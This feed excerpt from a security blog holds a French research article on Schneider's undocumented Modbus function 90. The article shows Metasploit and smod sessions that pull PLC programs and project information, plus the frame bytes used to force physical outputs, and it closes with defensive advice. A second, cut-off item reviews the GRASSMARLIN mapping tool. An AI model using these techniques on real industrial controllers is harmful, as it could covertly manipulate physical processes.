		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Fri, 09 Feb 2018 17:45:05 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[analyse]]></category>
		<category><![CDATA[audit]]></category>
		<category><![CDATA[ICS]]></category>
		<category><![CDATA[modbus]]></category>
		<category><![CDATA[SCADA]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15813</guid>

					<description><![CDATA[<p>Lors de la dernière édition de la DEFCON, nous avons présenté nos travaux de R&#38;D concernant un protocole propriétaire Schneider à l’ICS Village, espace dédié à la sécurité des SI industriels. Vous pouvez retrouver notre intervention en vidéo : https://www.youtube.com/watch?v=A_B69Rifu1g Revenons...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2018/02/fun-with-modbus-0x5a/">Fun with Modbus 0x5A</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: justify;">
<figure id="post-15816 media-15816" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15816 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1.jpg" alt="" width="640" height="168" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1.jpg 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1-437x115.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1-71x19.jpg 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<p>Lors de la dernière édition de la DEFCON, nous avons présenté nos travaux de R&amp;D concernant un protocole propriétaire Schneider à l’ICS Village, espace dédié à la sécurité des SI industriels.</p>
</div>
<div style="text-align: justify;">Vous pouvez retrouver notre intervention en vidéo : <a href="https://www.youtube.com/watch?v=A_B69Rifu1g">https://www.youtube.com/watch?v=A_B69Rifu1g</a></div>
<div style="text-align: justify;">Revenons sur ces travaux et la manière dont ils peuvent être exploités.</div>
<div style="text-align: justify;">
<p>&nbsp;</p>
<h2>Le protocole Modbus</h2>
</div>
<div style="text-align: justify;">Le protocole Modbus est un standard de communication utilisé dans les SI industriels. Développé dans les années 70 sur liaison série RS-485, il est désormais très répandu dans sa version TCP utilisable sur une liaison Ethernet classique.</div>
<div style="text-align: justify;">Le protocole Modbus défini un certain nombre de fonctions, qui servent majoritairement à lire/écrire des données sur un automate programmable industriel.</div>
<div style="text-align: justify;"></div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>root@kali:mbtget-master# ./mbtget -r3 -a 0 -n 8 192.168.0.110
values:
  1 (ad 00000):     1
  2 (ad 00001):     0
  3 (ad 00002):     0
  4 (ad 00003):     1
  5 (ad 00004):     0
  6 (ad 00005):     0
  7 (ad 00006):     0
  8 (ad 00007):     0</pre>
</div>
<div style="text-align: center;"><i>Lecture de données Modbus avec le programme « mbtget »</i></div>
<p>&nbsp;</p>
<div style="text-align: justify;">D’autres fonctions Modbus existent, comme l’indique ce tableau provenant du standard officiel :</div>
<div style="text-align: justify;">
<figure id="post-15818 media-15818" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15818 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1.png" alt="" width="640" height="442" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1-277x191.png 277w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1-56x39.png 56w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1-245x170.png 245w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: justify;">
<div style="text-align: center;"><i>Spécifications du protocole Modbus (http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf)</i></div>
</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Il est possible d’identifier la liste des fonctions Modbus supportées par un automate, par exemple avec l’outil smod:</div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>root@kali:~/smod# python smod.py 
&lt; SMOD &gt;
 ------- 
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
          --=[MODBUS Penetration Test FrameWork
       --+--=[Version : 1.0.4
       --+--=[Modules : 23
       --+--=[Coder   : Farzin Enddo
          --=[github  : www.github.com/enddo

SMOD &gt; use modbus/scanner/getfunc
SMOD modbus(getfunc) &gt; show options
 Name     Current Setting  Required  Description                                 
 ----     ---------------  --------  -----------                                 
 Output   True             False     The stdout save in output directory         
 RHOSTS                    True      The target address range or CIDR identifier 
 RPORT    502              False     The port number for modbus protocol         
 Threads  1                False     The number of concurrent threads            
 UID      None             True      Modbus Slave UID.                           
SMOD modbus(getfunc) &gt; set RHOSTS 192.168.0.110
SMOD modbus(getfunc) &gt; set UID 1
SMOD modbus(getfunc) &gt; exploit
[+] Module Get Function Start
[+] Looking for supported function codes on 192.168.0.110
[+] Function Code 1(Read Coils) is supported.
[+] Function Code 2(Read Discrete Inputs) is supported.
[+] Function Code 3(Read Multiple Holding Registers) is supported.
[+] Function Code 4(Read Input Registers) is supported.
[+] Function Code 5(Write Single Coil) is supported.
[+] Function Code 6(Write Single Holding Register) is supported.
[+] Function Code 8(Diagnostic) is supported.
[+] Function Code 15(Write Multiple Coils) is supported.
[+] Function Code 16(Write Multiple Holding Registers) is supported.
[+] Function Code 22(Mask Write Register) is supported.
[+] Function Code 23(Read/Write Multiple Registers) is supported.
[+] Function Code 43(Read Device Identification) is supported.
[+] Function Code 90 is supported.</pre>
</div>
<p>&nbsp;</p>
<p>On peut ainsi utiliser les fonctions de diagnostique pour identifier précisément l’automate, en l’occurrence un Schneider M340 :</p>
<div style="text-align: justify;">
<p class="separator" style="clear: both; text-align: center;">
<figure id="post-15820 media-15820" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15820 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3.jpg" alt="" width="375" height="206" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3.jpg 375w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3-348x191.jpg 348w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3-71x39.jpg 71w" sizes="auto, (max-width: 375px) 100vw, 375px" /></figure>
</div>
<div style="text-align: justify;">
<p>&nbsp;</p>
<h2>La fonction Modbus 0x5a</h2>
</div>
<div style="text-align: justify;">
<h3>Historique</h3>
</div>
<div style="text-align: justify;">L’utilisation du protocole Modbus pour la programmation des automates Schneider a été révélée publiquement grâce aux travaux du projet Basecamp lors de la célèbre conférence S4, dédiée à la sécurité des SI industriels : <a href="http://www.digitalbond.com/blog/2012/01/19/project-basecamp-at-s4/">http://www.digitalbond.com/blog/2012/01/19/project-basecamp-at-s4/</a></div>
<div style="text-align: justify;">Vous pouvez retrouver les vulnérabilités identifiées sur les systèmes Schneider (et bien d’autres) dans la présentation de Reid Wightman : <a href="https://youtu.be/dtadMIN3CCc?t=35m29">https://youtu.be/dtadMIN3CCc?t=35m29</a>s</div>
<div style="text-align: justify;">Nous avions déjà évoqué cette fonctionnalité dans notre article dédié au pentest d’automates dans le magazine MISC 74 . Il suffit d’observer les trames réseau échangées entre Unity Pro et l’automate lors de sa programmation pour identifier que c’est le protocole Modbus qui est utilisé, via une fonction non-documentée (90) :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<div style="text-align: center;">
<figure id="post-15822 media-15822" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15822 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4.jpg" alt="" width="640" height="168" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4.jpg 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4-437x115.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4-71x19.jpg 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: center;"><i>Capture réseau des échanges entre le logiciel de programmation et un automate Schneider</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">Comme les autres fonctions Modbus, il n’existe aucun mécanisme de sécurité pour ce protocole de programmation : il suffit d’avoir un accès réseau sur le port TCP 502 d’un automate pour pouvoir réaliser des actions d’administration.</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3>Récupération du programme automate</h3>
</div>
<div style="text-align: justify;">La récupération du programme de l’automate n’était, en tout cas dans nos tests, pas totalement fonctionnelle dans le module publié lors du projet Basecamp. Nous avions pu le modifier légèrement afin de prendre en compte des programmes de taille plus importante. Nous avons simplement eu à modifier un compteur pour la rendre fonctionnelle. Détaillons son utilisation.</div>
<div style="text-align: justify;">
<ul>
<li>Création d’une archive programme vide : Dans le logiciel Unity Pro, ouvrons un programme existant et enregistrons-le en tant qu’archive (« .sta »)</li>
<li>Récupérons le programme de l’automate</li>
</ul>
</div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>msf auxiliary(modicon_stux_transfer_ASO) &gt; set ACTION DOWNLOAD
ACTION =&gt; DOWNLOAD
msf auxiliary(modicon_stux_transfer_ASO) &gt; run

[*] 192.168.0.110:502 - MODBUS - Sending read request
[*] 192.168.0.110:502 - MODBUS - Retrieving file
[*] 192.168.0.110:502 - MODBUS - Closing file  '/opt/metasploit/apps/pro/msf3/data
/exploits/modicon_ladder.apx'
[*] Auxiliary module execution completed
msf auxiliary(modicon_stux_transfer_ASO) &gt;</pre>
</div>
<ul>
<li>Insérons le fichier « .apx » dans l’archive</li>
</ul>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>root@kali:~# file demo_archive.sta 
demo_archive.sta: Zip archive data, at least v1.0 to extract
root@kali:~# unzip demo_archive.sta
Archive:  demo_archive.sta
   creating: BinAppli/
  inflating: BinAppli/Station.apd    
  inflating: BinAppli/Station.apx    
  inflating: STATION.CTX             
 extracting: TA.xma                  
   creating: ThirdParty/
root@kali:~/unity# cp /opt/metasploit/apps/pro/msf3/data/exploits/modicon_ladder.apx 
BinAppli/Station.apx
root@kali:~/unity# ls
BinAppli  demo_archive.sta  STATION.CTX  TA.xma  ThirdParty
root@kali:~/unity# rm BinAppli/Station.apd
root@kali:~/unity# zip demo_archive2.sta -r BinAppli/ STATION.CTX  TA.xma  ThirdParty/
  adding: BinAppli/ (stored 0%)
  adding: BinAppli/Station.apx (deflated 61%)
  adding: BinAppli/Station.apd (deflated 19%)
  adding: STATION.CTX (deflated 58%)
  adding: TA.xma (stored 0%)
  adding: ThirdParty/ (stored 0%)
root@kali:~/unity#</pre>
</div>
<ul>
<li>Ouvrons le fichier dans Unity : il suffit ensuite d’ouvrir le fichier avec Unity pro pour accéder au programme :</li>
</ul>
<p class="separator" style="clear: both; text-align: center;">
<div style="text-align: justify;">
<div style="text-align: center;">
<figure id="post-15824 media-15824" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15824 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1.png" alt="" width="640" height="393" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1-311x191.png 311w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1-64x39.png 64w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: center;"><i>Affichage du code « ladder » dans Unity Pro</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">La vidéo ci-dessous montre l’utilisation du module pour télécharger le programme et vérifier qu’il s’agit du même que celui issu de Unity Pro : <a href="https://www.youtube.com/watch?v=xRbulEX3_3o">https://www.youtube.com/watch?v=xRbulEX3_3o</a></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">La démarche inverse, reprogrammer l’automate, est également possible en théorie. En revanche, nous n’avons pas réussi à le rendre fonctionnel. Lors de l’upload d’un nouveau programme, nous obtenons ensuite cette erreur :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<p id="post-15826 media-15826" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15826 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6.png" alt="" width="640" height="113" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6-437x77.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6-71x13.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></p>
</div>
<p>&nbsp;</p>
<div style="text-align: justify;">L’automate a bien été reprogrammé, mais il ne reconnaît pas le programme transmis et considère donc qu’il n’est pas programmé. Cette attaque permet donc plutôt un déni de service.</div>
<div style="text-align: justify;">
<h4>Récupération des informations du programme</h4>
</div>
<div style="text-align: justify;">L’analyse des trames échangées lors de l’initialisation de la connexion entre le logiciel de programmation légitime (Unity Pro) et l’automate permet d’identifier qu’un certain nombre d’informations sont envoyées par l’automate.</div>
<p class="separator" style="clear: both; text-align: center;">
<div style="text-align: center;">
<figure id="post-15828 media-15828" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15828 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7.png" alt="" width="640" height="364" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7-336x191.png 336w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7-69x39.png 69w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: justify;">
<div style="text-align: center;"><i>Capture réseau entre Unity Pro et un automate Schneider M340</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">Nous avons donc modifié le module Metasploit précédent afin de permettre la récupération de ces informations :</div>
<div style="text-align: justify;"></div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>msf &gt; use auxiliary/admin/scada/modicon_stux_transfer_ASO 
msf auxiliary(modicon_stux_transfer_ASO) &gt; show actions

Auxiliary actions:

   Name          Description
   ----          -----------
   DOWNLOAD      Download the ladder logic from the PLC
   GATHER_INFOS  Get informations about the PLC configuration
   UPLOAD        Upload a ladder logic file to the PLC


msf auxiliary(modicon_stux_transfer_ASO) &gt; set ACTION GATHER_INFOS 
ACTION =&gt; GATHER_INFOS
msf auxiliary(modicon_stux_transfer_ASO) &gt; show options

Module options (auxiliary/admin/scada/modicon_stux_transfer_ASO):

   Name      Current Setting                     Required  Description
   ----      ---------------                     --------  -----------
   FILENAME  [...]/modicon_ladder.apx            yes       The file to send or receive
   RHOST                                         yes       The target address
   RPORT     502                                 yes       The target port


Auxiliary action:

   Name          Description
   ----          -----------
   GATHER_INFOS  Get informations about the PLC configuration


msf auxiliary(modicon_stux_transfer_ASO) &gt; set RHOST 192.168.0.110
RHOST =&gt; 192.168.0.110
msf auxiliary(modicon_stux_transfer_ASO) &gt; run

[*] Sending initialization requests ...
[+] PLC model : BMX P34 2030
[+] Project name : Test - Project ABC 123 Yolo
[+] Project comments : this is where the comments are put. YOLO @@@ !!!
[+] Unity Pro software version : V5.0
[*] Auxiliary module execution completed</pre>
</div>
<div style="text-align: justify;">
<p style="text-align: center;"><i>Récupération d’information via le module Metasploit</i></p>
</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Ces informations concordent avec celles obtenues graphiquement dans le logiciel légitime :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15830 media-15830" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15830 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8.png" alt="" width="525" height="408" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8.png 525w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-246x191.png 246w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-50x39.png 50w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-156x121.png 156w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-155x120.png 155w" sizes="auto, (max-width: 525px) 100vw, 525px" /></figure>
</div>
<div style="text-align: center;"><i>Informations sur le projet dans Unity pro</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">
<h3>Forçage de valeurs</h3>
</div>
<div style="text-align: justify;">Le logiciel Unity Pro embarque également des fonctionnalités de simulation et de « forçage » des valeurs de l’automate. En effet, lors de l’installation d’un nouveau procédé industriel, il peut s’avérer pratique de « fausser » la valeur d’une variable pour simuler une action ou une situation spécifique. L’équivalent dans le monde informatique serait de « coder en dur » la valeur d’une variable.</div>
<div style="text-align: justify;">Cette opération se réalise dans Unity Pro par la création d’une « table d’animation » dans laquelle on va renseigner les variables à forcer :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15832 media-15832" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15832 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9.png" alt="" width="640" height="418" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9-292x191.png 292w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9-60x39.png 60w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;"><i>Forçage de valeurs à 1 dans Unity Pro</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Via l’analyse des trames réseau échangées lors du forçage de valeurs, il a été possible de comprendre partiellement le protocole. Ci-dessous, on présente une comparaison des trames pour forcer la sortie <b>%Q0.17</b> à 1, et forcer la sortie <b>%Q0.18</b> à 0 :</div>
<div style="text-align: justify;"></div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>[…]\x04\x00\x00\x00\x01\x00\x01\x20\x02\x01\x00\x11\x00\x01\x00\x00\x00\x03
[…]\x04\x00\x00\x00\x01\x00\x01\x20\x02\x01\x00\x12\x00\x01\x00\x00\x00\x02</pre>
</div>
<div style="text-align: justify;">Un octet permet de déterminer la sortie à forcer :</div>
<div style="text-align: justify;">
<ul>
<li>0x11 pour la sortie %Q0.17</li>
<li>0x12 pour la sortie %Q0.18</li>
</ul>
</div>
<p>La valeur de forçage est déterminée par le dernier octet :</p>
<ul>
<li>0x03 pour 0</li>
<li>0x02 pour 1</li>
<li>0x04 pour annuler le forçage</li>
</ul>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Dans la vidéo ci-dessous, on démontre le fonctionnement du module Metasploit en alternant les valeurs de forçage des sorties 17 à 23 : <a href="https://www.youtube.com/watch?time_continue=2&amp;v=D1p2ni0eGhc">https://www.youtube.com/watch?time_continue=2&amp;v=D1p2ni0eGhc</a></span></div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3><span style="font-family: inherit;">Pourquoi cette fonction est-elle intéressante du point de vue d’un attaquant ?</span></h3>
</div>
<div style="text-align: justify;"><span style="font-family: inherit;">Dans un SI industriel en fonctionnement, les opérateurs ne surveillent pas le procédé avec Unity pro, mais un logiciel de supervision de type SCADA ou DCS, qui va leur permettre d’avoir une vue d’ensemble du précédé et de pouvoir interagir avec les différents composants. Ce logiciel va donc interroger, à intervalle régulier, les automates pour afficher les valeurs correspondantes à l’opérateur.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Cependant, dans la majorité des cas, ces logiciels ne vont pas directement afficher la valeur des sorties des automates ; des variables intermédiaires ou calculées sont utilisées. Ainsi, un attaquant capable de forcer la valeur des sorties de l’automate va pouvoir influencer le procédé physique, sans pour autant que cela soit visible du point de vue de l’opérateur en train de superviser le procédé.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Une démonstration live a été faite lors de la DEFCON. On peut observer que la valeur du feu rouge sur le logiciel de supervision IGSS reste fixe, tandis qu’en manipulant directement les variables de sortie on peut influencer sur la couleur du feu physique : <a href="https://www.youtube.com/watch?v=A_B69Rifu1g">https://www.youtube.com/watch?v=A_B69Rifu1g</a></span></div>
<div style="text-align: justify;"><span style="font-family: inherit;"> </span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Le module Metasploit n&rsquo;étant pas totalement finalisé, il n&rsquo;a pas fait l&rsquo;objet d&rsquo;une pull request vers le dépôt officiel. Vous pouvez néanmoins le trouver ici : <a href="https://github.com/wavestone-cdt/ics-tools">https://github.com/wavestone-cdt/ics-tools</a>.</span></div>
<p>&nbsp;</p>
<h2 style="text-align: justify;"><span style="font-family: inherit;">Conclusion et sécurisation</span></h2>
<div style="text-align: justify;"><span style="font-family: inherit;">Ces travaux ont été principalement réalisés sur des automates Schneider Premium et M340. Ils sont partiellement portables sur les nouvelles générations (par exemple M221) avec quelques ajustements. En effet, une capture réseau lors de la programmation d’un automate M221 montrera que c’est bien la fonction Modbus 90 qui est utilisée pour la programmation, mais de manière légèrement différente. Elle peut également être utilisé pour la mise en mode START ou STOP, ainsi que pour le forçage des valeurs de sortie.</span></div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3><span style="font-family: inherit;">Qu’en est-il ailleurs ?</span></h3>
</div>
<div style="text-align: justify;"><span style="font-family: inherit;">L’utilisation de protocoles de communication non-sécurisés pour la programmation et la maintenance des automates programmables industriels est encore une réalité en cette fin d’année 2017. L’exemple ici présenté ne vise pas à cibler la marque Schneider en particulier. La grande majorité des constructeurs d’automates utilisent des protocoles non authentifiés pour la programmation. On pourrait notamment citer le cas de la majorité des automates reposant sur la bibliothèque CodeSys, comme démontré (là aussi) par Reid Wightman : <a href="http://www.digitalbond.com/blog/2012/10/25/new-project-basecamp-tools-for-codesys-200-vendors-affected/">http://www.digitalbond.com/blog/2012/10/25/new-project-basecamp-tools-for-codesys-200-vendors-affected/</a>.</span></div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3><span style="font-family: inherit;">Que faire ?</span></h3>
</div>
<div style="text-align: justify;"><span style="font-family: inherit;">La sécurisation d’un SI industriel doit donc prendre en compte le fait qu’un accès réseau sur le port TCP 502 permet d’accéder à la logique de l’automate, de la modifier mais également de forcer certaines valeurs, ce qui permet à un attaquant de mener une attaque qui ne sera pas visible de l’opérateur.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Les dernières versions d’automates, notamment dans les gammes les plus chères, incluent désormais des fonctions de sécurisation. L’approche la plus fréquente est d’encapsuler les protocoles non-sécurisés dans un tunnel authentifié et chiffré, avec TLS (Siemens) ou IPSEC (Schneider). Il conviendra cependant d’évaluer le bon niveau de sécurité de ces nouvelles fonctionnalités.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Il faut donc commencer par appliquer les bonnes pratiques de cloisonnement réseau, et superviser les actions d’administration. On peut par exemple mettre en place une sonde de type IDS avec une signature dédiée à la fonction 90 de Modbus.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Enfin, un axe d’amélioration axé métier serait la mise en place de mécanismes de contrôle d’intégrité au niveau des automates et du SCADA, permettant de s’assurer que les variables utilisées reflètent la réalité du procédé physique. On pourrait ainsi imaginer l&rsquo;insertion, dans la logique de l&rsquo;automate, quelques fonctions visant à assurer la détection d&rsquo;une incohérence entre une valeur intermédiaire et une valeur de sortie. De la même manière, il serait intéressant pour le logiciel SCADA de pouvoir notifier l&rsquo;opérateur lorsque des valeurs sont forcées, mais cette capacité n&rsquo;est, à notre connaissance, pas proposée par les automates étudiés.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;"><br />
</span></p>
<div style="text-align: right;"><b>Arnaud SOULLIE</b></div>
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2018/02/fun-with-modbus-0x5a/">Fun with Modbus 0x5A</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Test de Grassmarlin, outil open-source de cartographie passive pour SI industriels</title>
		<link>https://www.riskinsight-wavestone.com/2016/03/test-de-grassmarlin-outil-open-source/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Mon, 07 Mar 2016 09:00:41 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[open-source]]></category>
		<category><![CDATA[outil]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15683</guid>

					<description><![CDATA[<p>La première étape dans un projet de sécurisation de son SI industriel est bien souvent la création, ou la fiabilisation, d’un inventaire de l’ensemble des composants. En effet, l’inventaire et la documentation existante peuvent s’avérer insuffisant ou non-fiable. C’est à...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2016/03/test-de-grassmarlin-outil-open-source/">Test de Grassmarlin, outil open-source de cartographie passive pour SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15684 media-15684" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15684 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1.png" alt="" width="640" height="332" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1-368x191.png 368w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1-71x37.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<p><i>La première étape dans un projet de sécurisation de son SI industriel est bien souvent la création, ou la fiabilisation, d’un inventaire de l’ensemble des composants. En effet, l’inventaire et la documentation existante peuvent s’avérer insuffisant ou non-fiable.</i><br />
<i>C’est à ce besoin que répond l’outil GRASSMARLIN en fournissant une solution de cartographie réseau passive adaptée au secteur industriel.</i></p>
<p>&nbsp;</p>
<h1>Présentation de GRASSMARLIN</h1>
<p>GRASSMARLIN est un outil permettant de cartographier de manière passive un réseau industriel. Cet outil, premièrement développé par la National Security Agency (NSA) des États-Unis est désormais Open-Source et directement accessible sur GitHub (<a href="https://github.com/iadgov/GRASSMARLIN">https://github.com/iadgov/GRASSMARLIN</a>).<br />
L’outil GRASSMARLIN permet d’obtenir une image ou « snapshot » du système d’information (SI) industriel avec notamment:</p>
<ul>
<li>Les équipements présents</li>
<li>Les communications existantes entre les équipements</li>
<li>Des méta-informations obtenues à partir des communications (localisation, constructeurs)</li>
</ul>
<p>L’outil est disponible sur la plateforme Windows (version 7+, 64bits uniquement), certaines distributions Linux (Fedora, Ubuntu) et est téléchargeable au lien suivant : <a href="https://github.com/iadgov/GRASSMARLIN/releases/latest">https://github.com/iadgov/GRASSMARLIN/releases/latest</a>.</p>
<p>Une perte de disponibilité d’un équipement du SI industriel pouvant avoir des conséquences importantes (arrêt de la production, perte de visibilité pour les opérateurs, …), la cartographie est entièrement passive. Les communications sont enregistrées puis analysées, contrairement à un scan actif avec nmap ou plcscan qui vont activement envoyer des paquets à destination de toutes les adresses IP et analyser les éventuels retours.</p>
<h1>Fonctionnement de Grassmarlin</h1>
<p>GRASSMARLIN permet d’obtenir deux types de topologies du réseau industriel :</p>
<ul>
<li>La « Logical View » : fournit une liste des équipements présents et des communications existantes, nommée par la suite la vue logique.</li>
<li>La « Physical View » : permet d’obtenir les liens physiques entre les équipements en donnant par exemple le numéro de port d’un routeur auquel un automate est connecté, nommée par la suite la vue physique.</li>
</ul>
<h2>La détection passive</h2>
<p>La méthode de découverte de réseau étant passive l’outil GRASSMARLIN ne génère aucun trafic sur le réseau. Ainsi afin d’obtenir des résultats de la vue logique ce dernier va simplement écouter les communications sur le réseau tel un analyseur de trame classique. En d’autres termes, GRASSMARLIN ne pourra analyser que les communications qu’il est en mesure d’écouter sur sa machine hôte.</p>
<figure id="post-15686 media-15686" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15686 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1.png" alt="" width="640" height="450" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1-272x191.png 272w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1-55x39.png 55w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><i><u>Figure 1 : Visibilité de GRASSMARLIN</u></i></div>
<div style="text-align: center;"></div>
<p>Il est aussi possible d’obtenir une topologie réseau à partir de captures réseaux (fichiers PCAP) générées à des instants ultérieurs à d’autres points du réseau.<br />
De même, pour générer la vue physique GRASSMARLIN utilise des logs de routeur Cisco et reste donc totalement passif.</p>
<h3>Vue logique</h3>
<p>Dans cette vue, la topologie du réseau se présente comme suit :</p>
